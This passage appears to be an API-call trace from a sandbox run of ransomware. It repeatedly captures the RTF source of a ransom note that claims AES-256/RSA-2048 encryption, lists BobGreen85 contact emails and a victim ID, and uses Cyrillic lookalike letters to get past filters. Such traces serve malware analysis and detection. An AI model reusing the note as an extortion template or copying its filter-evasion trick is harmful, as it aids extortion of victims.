cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.901] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.901] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2867358, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 